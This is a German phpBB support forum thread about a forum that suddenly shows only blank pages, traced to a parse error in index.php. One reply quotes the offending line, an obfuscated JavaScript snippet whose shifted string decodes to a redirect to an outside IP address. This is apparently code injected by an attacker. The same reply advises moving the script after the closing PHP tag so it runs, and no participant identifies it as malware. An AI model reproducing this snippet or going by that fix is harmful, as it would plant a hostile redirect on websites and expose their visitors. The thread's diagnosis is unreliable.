Forum nicht mehr erreichbar, nur noch Weisse Seiten

Fragen zur Bedienung von phpBB 3.0.x, Probleme bei der Benutzung und alle weiteren Fragen inkl. Update auf die neuste phpBB 3.0.14 Version
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
SECU
Mitglied
Re: Forum nicht mehr erreichbar, nur noch Weisse Seiten

Beitrag von SECU »

Ja Danke Redbull,

alerdings eine Unbefriedigende Lösung, keine Lust und Zeit jedesmal das komplette Forum wieder auf zu bauen nur weil irgend was ohne Grund passiert.
Das kann auch nicht die Lösung sein, fange ich in 2 Monaten wieder an.
Trotzdem Danke.

Naja vielleicht hat ja noch jemand eine Idee.
redbull254
Ehemaliges Teammitglied

Beitrag von redbull254 »

Der einzige, der die Frage zu der Bearbeitung Deiner Dateien beantworten kann bist letztendlich Du selber. :)

Ich habe lediglich versucht Dir eine Möglichkeit aufzuzeigen wie Du wieder ins Forum kommst. ;-)

Ohne Grund passiert nie etwas, nur was der Grund jetzt bei Dir ist oder war kann ich Dir leider nicht beantworten.
Das würde hellseherische Fähigkeiten voraussetzen die ich definitiv nicht besitze. ;-)
Beste Grüße
Walter
SECU
Mitglied

Beitrag von SECU »

redbull254 hat geschrieben:Der einzige, der die Frage zu der Bearbeitung Deiner Dateien beantworten kann bist letztendlich Du selber. :)

Ich habe lediglich versucht Dir eine Möglichkeit aufzuzeigen wie Du wieder ins Forum kommst. ;-)

Ohne Grund passiert nie etwas, nur was der Grund jetzt bei Dir ist oder war kann ich Dir leider nicht beantworten.
Das würde hellseherische Fähigkeiten voraussetzen die ich definitiv nicht besitze. ;-)

Danke dir ja auch Das wollte ich eigentlich nIcht machen, naja Hilft ja nix.

Aber wie gesagt es passierte einfach so, nix gemacht Ausser normal im Forum geschrieben kein Admin bereich besucht nix.

:grin: Danke Dir Red
posaunen
Mitglied

Beitrag von posaunen »

Änder die angezeigte Zeile:

Statt:

Code: Alles auswählen

<script language="JavaScript">if(document.cookie.indexOf("udb=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}</script>    ?>
So:

Code: Alles auswählen

?>
<script language="JavaScript">if(document.cookie.indexOf("udb=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}</script>    
redbull254
Ehemaliges Teammitglied

Beitrag von redbull254 »

Öhm, was soll diese Änderung bringen? :-?
Es würde so nach dem Ende der Datei erst recht Code angezeigt was aber nicht sein darf.
Um in den PHP-Modus zu wechseln wird die Zeichenfolge <?php verwendet. Zum Verlassen des PHP-Modus wird die Zeichenfolge ?> verwendet.
Beste Grüße
Walter
posaunen
Mitglied

Beitrag von posaunen »

Die Änderung soll die Verarbeitung von PHP-Code an der Stelle unterbrechen an welcher dieser endet und "normale" html-Tags abgearbeitet werden müssen.
redbull254
Ehemaliges Teammitglied

Beitrag von redbull254 »

Richtig, dies ist aber eine reine .php Datei wie man an der Datei-Endung erkennt. Und der PHP-Interpreter wird diese dann auch so abarbeiten.

Schau einmal in die index.php rein, genau weil noch Code nach dem Ende kam hat es ja geknallt. :)
"vielen Dank für Ihre Anfrage. Ruft man Ihr Forum auf, erscheint folgende Fehlermeldung in der Errorlogdatei in Ihrem Account:

[Wed Mar 23 08:57:56 2011] [warn] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '<' in forum/index.php on line 293

Dieser Fehler zeigt Ihnen, dass die Datei index.php in Ihrem Ordner Forum in Zeile 293 einen Fehler aufweist. Der Fehler wäre hier "PHP Parse error: syntax error, unexpected '<'".
Beste Grüße
Walter
posaunen
Mitglied

Beitrag von posaunen »

Meines Erachtens hat es geknallt weil "normales" html innerhalb eines PHP-Bereiches enthalten ist.

Die Möglichkeit PHP an- und abzuschalten macht gerade auch den Charme der Skriptsprache aus.

Was das javascript am Ende der Seite dann macht habe ich mir allerdings nicht angesehen.
redbull254
Ehemaliges Teammitglied

Beitrag von redbull254 »

posaunen hat geschrieben: Die Möglichkeit PHP an- und abzuschalten macht gerade auch den Charme der Skriptsprache aus.
Volle Zustimmung. :)

Hast recht, PHP verlassen und Javascript schreiben, dann wieder in PHP rein (wenn nötig).

<?
PHP Code
?>

<script language="javascript">
Und nun Javascript
</script>

<?
Nun wieder PHP rein
?>

Wie auch immer, wir können das gerne per PN weiterführen. :)
Hier im Beitrag wird es doch zu sehr Off_Topic. :oops:

Der Thread-Ersteller kann es ja einfach testen und dann berichten. Wobei seine Frage dadurch leider auch nicht beantwortet wird warum es so die ganze Zeit funktioniert haben sollte. :-?
Beste Grüße
Walter
posaunen
Mitglied

Beitrag von posaunen »

Stimmt! Und das javascript muß ja auch irgendwoher kommen.
Antworten

Zurück zu „[3.0.x] Administration, Benutzung und Betrieb“